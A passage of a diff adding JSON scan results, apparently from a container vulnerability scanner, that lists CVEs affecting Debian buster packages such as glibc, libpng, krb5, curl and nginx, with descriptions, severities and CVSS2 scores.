+ "A flaw was found in the way certificate signatures could be forged using collisions
+ found in the SHA-1 algorithm. An attacker could use this weakness to create forged
+ certificate signatures. This issue affects GnuPG versions before 2.2.18.", "uri":
+ "https://security-tracker.debian.org/tracker/CVE-2019-14855", "severity": "LOW",
+ "attributes": [{"key": "package_version", "value": "2.2.12-1+deb10u1"}, {"key":
+ "package_name", "value": "gnupg2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"},
+ {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-13627", "description":
+ "It was discovered that there was a ECDSA timing attack in the libgcrypt20 cryptographic
+ library. Version affected: 1.8.4-5, 1.7.6-2+deb9u3, and 1.6.3-2+deb8u4. Versions
+ fixed: 1.8.5-2 and 1.6.3-2+deb8u7.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-13627",
+ "severity": "LOW", "attributes": [{"key": "package_version", "value": "1.8.4-5+deb10u1"},
+ {"key": "package_name", "value": "libgcrypt20"}, {"key": "CVSS2_VECTOR", "value":
+ "AV:L/AC:H/Au:N/C:P/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "2.6"}]}, {"name":
+ "CVE-2018-14553", "description": "gdImageClone in gd.c in libgd 2.1.0-rc2 through
+ 2.2.5 has a NULL pointer dereference allowing attackers to crash an application
+ via a specific function call sequence. Only affects PHP when linked with an external
+ libgd (not bundled).", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-14553",
+ "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.2.5-5.2"},
+ {"key": "package_name", "value": "libgd2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2021-36086", "description":
+ "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission
+ (called from cil_reset_classperms_set and cil_reset_classperms_list).", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-36086",
+ "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.8-1"},
+ {"key": "package_name", "value": "libsepol"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2021-36085", "description":
+ "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms
+ (called from __verify_map_perm_classperms and hashtab_map).", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-36085",
+ "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.8-1"},
+ {"key": "package_name", "value": "libsepol"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2021-36087", "description":
+ "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any
+ (called indirectly from cil_check_neverallow). This occurs because there is sometimes
+ a lack of checks for invalid statements in an optional block.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-36087",
+ "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.8-1"},
+ {"key": "package_name", "value": "libsepol"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2021-36084", "description":
+ "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms
+ (called from __cil_verify_classpermission and __cil_pre_verify_helper).", "uri":
+ "https://security-tracker.debian.org/tracker/CVE-2021-36084", "severity": "LOW",
+ "attributes": [{"key": "package_version", "value": "2.8-1"}, {"key": "package_name",
+ "value": "libsepol"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2019-17498", "description":
+ "In libssh2 v1.9.0 and earlier versions, the SSH_MSG_DISCONNECT logic in packet.c
+ has an integer overflow in a bounds check, enabling an attacker to specify an arbitrary
+ (out-of-bounds) offset for a subsequent memory read. A crafted SSH server may be
+ able to disclose sensitive information or cause a denial of service condition on
+ the client system when a user connects to the server.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-17498",
+ "severity": "LOW", "attributes": [{"key": "package_version", "value": "1.8.0-2.1"},
+ {"key": "package_name", "value": "libssh2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "5.8"}]}, {"name": "CVE-2019-17543", "description":
+ "LZ4 before 1.9.2 has a heap-based buffer overflow in LZ4_write32 (related to LZ4_compress_destSize),
+ affecting applications that call LZ4_compress_fast with a large input. (This issue
+ can also lead to data corruption.) NOTE: the vendor states \"only a few specific
+ / uncommon usages of the API are at risk.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-17543",
+ "severity": "LOW", "attributes": [{"key": "package_version", "value": "1.8.3-1+deb10u1"},
+ {"key": "package_name", "value": "lz4"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"},
+ {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2013-0337", "description":
+ "The default configuration of nginx, possibly 1.3.13 and earlier, uses world-readable
+ permissions for the (1) access.log and (2) error.log files, which allows local users
+ to obtain sensitive information by reading the files.", "uri": "https://security-tracker.debian.org/tracker/CVE-2013-0337",
+ "severity": "LOW", "attributes": [{"key": "package_version", "value": "1.21.1-1~buster"},
+ {"key": "package_name", "value": "nginx"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"},
+ {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2018-7169", "description":
+ "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and
+ allows an unprivileged user to be placed in a user namespace where setgroups(2)
+ is permitted. This allows an attacker to remove themselves from a supplementary
+ group, which may allow access to certain filesystem paths if the administrator has
+ used \"group blacklisting\" (e.g., chmod g-rwx) to restrict access to paths. This
+ flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups
+ knob) to prevent this sort of privilege escalation.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-7169",
+ "severity": "LOW", "attributes": [{"key": "package_version", "value": "1:4.5-1.1"},
+ {"key": "package_name", "value": "shadow"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"},
+ {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2021-37600", "description":
+ "An integer overflow in util-linux through 2.37.1 can potentially cause a buffer
+ overflow if an attacker were able to use system resources in a way that leads to
+ a large number in the /proc/sysvipc/sem file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-37600",
+ "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.33.1-0.1"},
+ {"key": "package_name", "value": "util-linux"}, {"key": "CVSS2_VECTOR", "value":
+ "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name":
+ "CVE-2011-3374", "description": "It was found that apt-key in apt, all versions,
+ do not correctly validate gpg keys with the master keyring, leading to a potential
+ man-in-the-middle attack.", "uri": "https://security-tracker.debian.org/tracker/CVE-2011-3374",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "1.8.2.3"}, {"key": "package_name", "value": "apt"}, {"key": "CVSS2_VECTOR", "value":
+ "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name":
+ "CVE-2019-18276", "description": "An issue was discovered in disable_priv_mode in
+ shell.c in GNU Bash through 5.0 patch 11. By default, if Bash is run with its effective
+ UID not equal to its real UID, it will drop privileges by setting its effective
+ UID to its real UID. However, it does so incorrectly. On Linux and other systems
+ that support \"saved UID\" functionality, the saved UID is not dropped. An attacker
+ with command execution in the shell can use \"enable -f\" for runtime loading of
+ a new builtin, which can be a shared object that calls setuid() and therefore regains
+ privileges. However, binaries running with an effective UID of 0 are unaffected.",
+ "uri": "https://security-tracker.debian.org/tracker/CVE-2019-18276", "severity":
+ "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "5.0-4"}, {"key":
+ "package_name", "value": "bash"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:C/I:C/A:C"},
+ {"key": "CVSS2_SCORE", "value": "7.2"}]}, {"name": "CVE-2017-18018", "description":
+ "In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent
+ replacement of a plain file with a symlink during use of the POSIX \"-R -L\" options,
+ which allows local users to modify the ownership of arbitrary files by leveraging
+ a race condition.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-18018",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "8.30-3"}, {"key": "package_name", "value": "coreutils"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "1.9"}]},
+ {"name": "CVE-2021-22923", "description": "When curl is instructed to get content
+ using the metalink feature, and a user name and password are used to download the
+ metalink XML file, those same credentials are then subsequently passed on to each
+ of the servers from which curl will download or try to download the contents from.
+ Often contrary to the user''s expectations and intentions and without telling the
+ user it happened.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-22923",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "7.64.0-4+deb10u2"}, {"key": "package_name", "value": "curl"}]}, {"name": "CVE-2021-22922",
+ "description": "When curl is instructed to download content using the metalink feature,
+ thecontents is verified against a hash provided in the metalink XML file.The metalink
+ XML file points out to the client how to get the same contentfrom a set of different
+ URLs, potentially hosted by different servers and theclient can then download the
+ file from one or several of them. In a serial orparallel manner.If one of the servers
+ hosting the contents has been breached and the contentsof the specific file on that
+ server is replaced with a modified payload, curlshould detect this when the hash
+ of the file mismatches after a completeddownload. It should remove the contents
+ and instead try getting the contentsfrom another URL. This is not done, and instead
+ such a hash mismatch is onlymentioned in text and the potentially malicious content
+ is kept in the file ondisk.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-22922",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "7.64.0-4+deb10u2"}, {"key": "package_name", "value": "curl"}]}, {"name": "CVE-2013-0340",
+ "description": "expat 2.1.0 and earlier does not properly handle entities expansion
+ unless an application developer uses the XML_SetEntityDeclHandler function, which
+ allows remote attackers to cause a denial of service (resource consumption), send
+ HTTP requests to intranet servers, or read arbitrary files via a crafted XML document,
+ aka an XML External Entity (XXE) issue. NOTE: it could be argued that because expat
+ already provides the ability to disable external entity expansion, the responsibility
+ for resolving this issue lies with application developers; according to this argument,
+ this entry should be REJECTed, and each affected application would need its own
+ CVE.", "uri": "https://security-tracker.debian.org/tracker/CVE-2013-0340", "severity":
+ "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "2.2.6-2+deb10u1"},
+ {"key": "package_name", "value": "expat"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"},
+ {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2019-1010023", "description":
+ "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library
+ with malicious ELF file. The impact is: In worst case attacker may evaluate privileges.
+ The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim
+ and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate \"this
+ is being treated as a non-security bug and no real threat.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-1010023",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value":
+ "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name":
+ "CVE-2010-4051", "description": "The regcomp implementation in the GNU C Library
+ (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent
+ attackers to cause a denial of service (application crash) via a regular expression
+ containing adjacent bounded repetitions that bypass the intended RE_DUP_MAX limitation,
+ as demonstrated by a {10,}{10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit
+ for ProFTPD, related to a \"RE_DUP_MAX overflow.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2010-4051",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value":
+ "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name":
+ "CVE-2019-1010022", "description": "** DISPUTED ** GNU Libc current is affected
+ by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection.
+ The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability
+ and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments
+ indicate \"this is being treated as a non-security bug and no real threat.\"", "uri":
+ "https://security-tracker.debian.org/tracker/CVE-2019-1010022", "severity": "INFORMATIONAL",
+ "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name",
+ "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"},
+ {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2010-4052", "description":
+ "Stack consumption vulnerability in the regcomp implementation in the GNU C Library
+ (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent
+ attackers to cause a denial of service (resource exhaustion) via a regular expression
+ containing adjacent repetition operators, as demonstrated by a {10,}{10,}{10,}{10,}
+ sequence in the proftpd.gnu.c exploit for ProFTPD.", "uri": "https://security-tracker.debian.org/tracker/CVE-2010-4052",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value":
+ "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name":
+ "CVE-2019-1010024", "description": "** DISPUTED ** GNU Libc current is affected
+ by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread
+ stack and heap. The component is: glibc. NOTE: Upstream comments indicate \"this
+ is being treated as a non-security bug and no real threat.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-1010024",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value":
+ "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name":
+ "CVE-2010-4756", "description": "The glob implementation in the GNU C Library (aka
+ glibc or libc6) allows remote authenticated users to cause a denial of service (CPU
+ and memory consumption) via crafted glob expressions that do not match any pathnames,
+ as demonstrated by glob expressions in STAT commands to an FTP daemon, a different
+ vulnerability than CVE-2010-2632.", "uri": "https://security-tracker.debian.org/tracker/CVE-2010-4756",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value":
+ "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4"}]}, {"name":
+ "CVE-2019-1010025", "description": "** DISPUTED ** GNU Libc current is affected
+ by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created
+ thread. The component is: glibc. NOTE: the vendor''s position is \"ASLR bypass itself
+ is not a vulnerability.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-1010025",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value":
+ "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name":
+ "CVE-2018-20796", "description": "In the GNU C Library (aka glibc or libc6) through
+ 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion,
+ as demonstrated by ''(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+'' in grep.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-20796",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value":
+ "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name":
+ "CVE-2019-9192", "description": "** DISPUTED ** In the GNU C Library (aka glibc
+ or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled
+ Recursion, as demonstrated by ''(|)(\\\\1\\\\1)*'' in grep, a different issue than
+ CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability
+ because the behavior occurs only with a crafted pattern.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-9192",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value":
+ "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name":
+ "CVE-2011-3389", "description": "The SSL protocol, as used in certain configurations
+ in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome,
+ Opera, and other products, encrypts data by using CBC mode with chained initialization
+ vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers
+ via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction
+ with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection
+ API, or (3) the Silverlight WebClient API, aka a \"BEAST\" attack.", "uri": "https://security-tracker.debian.org/tracker/CVE-2011-3389",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "3.6.7-4+deb10u7"}, {"key": "package_name", "value": "gnutls28"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "4.3"}]},
+ {"name": "CVE-2021-30535", "description": "Double free in ICU in Google Chrome prior
+ to 91.0.4472.77 allowed a remote attacker to potentially exploit heap corruption
+ via a crafted HTML page.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-30535",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "63.1-6+deb10u1"}, {"key": "package_name", "value": "icu"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]},
+ {"name": "CVE-2017-9937", "description": "In LibTIFF 4.0.8, there is a memory malloc
+ failure in tif_jbig.c. A crafted TIFF document can lead to an abort resulting in
+ a remote denial of service attack.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-9937",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "2.1-3.1"}, {"key": "package_name", "value": "jbigkit"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]},
+ {"name": "CVE-2018-5709", "description": "An issue was discovered in MIT Kerberos
+ 5 (aka krb5) through 1.16. There is a variable \"dbentry->n_key_data\" in kadmin/dbutil/dump.c
+ that can store 16-bit data but unknowingly the developer has assigned a \"u4\" variable
+ to it, which is for 32-bit data. An attacker can use this vulnerability to affect
+ other artifacts of the database as we know that a Kerberos database dump file contains
+ trusted data.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-5709",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "1.17-3+deb10u1"}, {"key": "package_name", "value": "krb5"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]},
+ {"name": "CVE-2021-36222", "description": "ec_verify in kdc/kdc_preauth_ec.c in
+ the Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) before 1.18.4 and
+ 1.19.x before 1.19.2 allows remote attackers to cause a NULL pointer dereference
+ and daemon crash. This occurs because a return value is not properly managed in
+ a certain situation.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-36222",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "1.17-3+deb10u1"}, {"key": "package_name", "value": "krb5"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]},
+ {"name": "CVE-2004-0971", "description": "The krb5-send-pr script in the kerberos5
+ (krb5) package in Trustix Secure Linux 1.5 through 2.1, and possibly other operating
+ systems, allows local users to overwrite files via a symlink attack on temporary
+ files.", "uri": "https://security-tracker.debian.org/tracker/CVE-2004-0971", "severity":
+ "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.17-3+deb10u1"},
+ {"key": "package_name", "value": "krb5"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:P/A:N"},
+ {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2018-6829", "description":
+ "cipher/elgamal.c in Libgcrypt through 1.8.2, when used to encrypt messages directly,
+ improperly encodes plaintexts, which allows attackers to obtain sensitive information
+ by reading ciphertext data (i.e., it does not have semantic security in face of
+ a ciphertext-only attack). The Decisional Diffie-Hellman (DDH) assumption does not
+ hold for Libgcrypt''s ElGamal implementation.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-6829",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "1.8.4-5+deb10u1"}, {"key": "package_name", "value": "libgcrypt20"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]},
+ {"name": "CVE-2018-11813", "description": "libjpeg 9c has a large loop because read_pixel
+ in rdtarga.c mishandles EOF.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-11813",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "1:1.5.2-2+deb10u1"}, {"key": "package_name", "value": "libjpeg-turbo"}, {"key":
+ "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value":
+ "5"}]}, {"name": "CVE-2020-17541", "description": "Libjpeg-turbo all version have
+ a stack-based buffer overflow in the \"transform\" component. A remote attacker
+ can send a malformed jpeg file to the service and cause arbitrary code execution
+ or denial of service of the target service.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-17541",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "1:1.5.2-2+deb10u1"}, {"key": "package_name", "value": "libjpeg-turbo"}, {"key":
+ "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value":
+ "6.8"}]}, {"name": "CVE-2017-15232", "description": "libjpeg-turbo 1.5.2 has a NULL
+ Pointer Dereference in jdpostct.c and jquant1.c via a crafted JPEG file.", "uri":
+ "https://security-tracker.debian.org/tracker/CVE-2017-15232", "severity": "INFORMATIONAL",
+ "attributes": [{"key": "package_version", "value": "1:1.5.2-2+deb10u1"}, {"key":
+ "package_name", "value": "libjpeg-turbo"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2018-14048", "description":
+ "An issue has been found in libpng 1.6.34. It is a SEGV in the function png_free_data
+ in png.c, related to the recommended error handling for png_read_image.", "uri":
+ "https://security-tracker.debian.org/tracker/CVE-2018-14048", "severity": "INFORMATIONAL",
+ "attributes": [{"key": "package_version", "value": "1.6.36-6"}, {"key": "package_name",
+ "value": "libpng1.6"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"},
+ {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2019-6129", "description":
+ "** DISPUTED ** png_create_info_struct in png.c in libpng 1.6.36 has a memory leak,
+ as demonstrated by pngcp. NOTE: a third party has stated \"I don''t think it is
+ libpng''s job to free this buffer.\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-6129",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "1.6.36-6"}, {"key": "package_name", "value": "libpng1.6"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]},
+ {"name": "CVE-2018-14550", "description": "An issue has been found in third-party
+ PNM decoding associated with libpng 1.6.35. It is a stack-based buffer overflow
+ in the function get_token in pnm2png.c in pnm2png.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-14550",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "1.6.36-6"}, {"key": "package_name", "value": "libpng1.6"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]},
+ {"name": "CVE-2019-9893", "description": "libseccomp before 2.4.0 did not correctly
+ generate 64-bit syscall argument comparisons using the arithmetic operators (LT,
+ GT, LE, GE), which might able to lead to bypassing seccomp filters and potential
+ privilege escalations.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-9893",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "2.3.3-4"}, {"key": "package_name", "value": "libseccomp"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "7.5"}]},
+ {"name": "CVE-2018-1000654", "description": "GNU Libtasn1-4.13 libtasn1-4.13 version
+ libtasn1-4.13, libtasn1-4.12 contains a DoS, specifically CPU usage will reach 100%
+ when running asn1Paser against the POC due to an issue in _asn1_expand_object_id(p_tree),
+ after a long time, the program will be killed. This attack appears to be exploitable
+ via parsing a crafted file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-1000654",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "4.13-3"}, {"key": "package_name", "value": "libtasn1-6"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, {"key": "CVSS2_SCORE", "value": "7.1"}]},
+ {"name": "CVE-2016-9085", "description": "Multiple integer overflows in libwebp
+ allows attackers to have unspecified impact via unknown vectors.", "uri": "https://security-tracker.debian.org/tracker/CVE-2016-9085",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "0.6.1-2+deb10u1"}, {"key": "package_name", "value": "libwebp"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]},
+ {"name": "CVE-2015-9019", "description": "In libxslt 1.1.29 and earlier, the EXSLT
+ math.random function was not initialized with a random seed during startup, which
+ could cause usage of this function to produce predictable outputs.", "uri": "https://security-tracker.debian.org/tracker/CVE-2015-9019",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "1.1.32-2.2~deb10u1"}, {"key": "package_name", "value": "libxslt"}, {"key": "CVSS2_VECTOR",
+ "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]},
+ {"name": "CVE-2009-4487", "description": "nginx 0.7.64 writes data to a log file
+ without sanitizing non-printable characters, which might allow remote attackers
+ to modify a window''s title, or possibly execute arbitrary commands or overwrite
+ files, via an HTTP request containing an escape sequence for a terminal emulator.",
+ "uri": "https://security-tracker.debian.org/tracker/CVE-2009-4487", "severity":
+ "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "1.21.1-1~buster"},
+ {"key": "package_name", "value": "nginx"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"},
+ {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2020-15719", "description":
+ "libldap in certain third-party OpenLDAP packages has a certificate-validation flaw
+ when the third-party package is asserting RFC6125 support. It considers CN even
+ when there is a non-matching subjectAltName (SAN). This is fixed in, for example,
+ openldap-2.4.46-10.el8 in Red Hat Enterprise Linux.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-15719",
+ "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+ "2.4.47+dfsg-3+deb10u6"}, {"key": "package_name", "value": "openldap"}, {"key":
+ "CVSS2_VECTOR", "value": "AV:N/AC:H/Au:N/C:P/I:P/A:N"}, {"key": "CVSS2_SCORE", "value":
+ "4"}]}, {"name": "CVE-2015-3276", "description": "The nss_parse_ciphers function
+ in libraries/libldap/tls_m.c in OpenLDAP does not properly parse OpenSSL-style multi-keyword
+ mode cipher strings, which might cause a weaker than intended cipher to be used
+ and allow remote attackers to have unspecified impact via unknown vectors.", "uri":
+ "https://security-tracker.debian.org/tracker/CVE-2015-3276", "severity": "INFORMATIONAL",
+ "attributes": [{"key": "package_version", "value": "2.4.47+dfsg-3+deb10u6"}, {"key":
